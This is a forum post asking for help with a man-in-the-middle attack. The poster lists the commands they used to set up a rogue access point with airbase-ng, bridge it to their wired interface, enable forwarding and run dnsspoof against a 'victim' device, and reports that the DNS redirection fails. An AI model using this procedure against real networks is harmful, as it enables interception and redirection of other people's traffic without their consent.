Hello,
I am currently working on MITM attacks and I am trying to redirect websites to my computer through dnsspoof, and the problem is that, although it is picking up traffic and I can see it registers all the sites the victim is visiting, it is still letting the victim connect to the website instead of redirecting it to me.
Here is my procedure:
-firstly I created a mon0 interface from the wlan0 wireless card
-I started up my access point [ airbase-ng --essid mitm -c 11 mon0 ]
-then I created a bridge between at0 and eth0:
brctl addbr mitm-bridge
brctl addif mitm-bridge eth0
brctl addif mitm-bridge at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
-then I went into [ ifconfig ] to see my IP (let's say it is 150.150.1.1) and did:
ifconfig mitm-bridge 150.150.1.1 up
-so now my machine and the bridge have the same IP
-then I did IP forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
-I connected the victim to the airbase-ng and everything was fine. The traffic was going through and there was no problem.
-then I did:
dnsspoof -i mitm-bridge
-it started, and when I went to google.com on the victim machine it didn't reroute it. It just went to google.com
-when it connected to google.com it showed:
192.168.1.13 .<some random 5 digit number> > 192.186.1.1.53 A? google.com
-from where I was getting my information about dnsspoof, it showed that instead of 192.168.1.13 (the IP of the victim device) there should be 150.150.1.1 (the attacking device), and it was stated that the connection would be refused, but it wasn't!
Please help me!
I have been trying to figure this out for a week now...
Good day!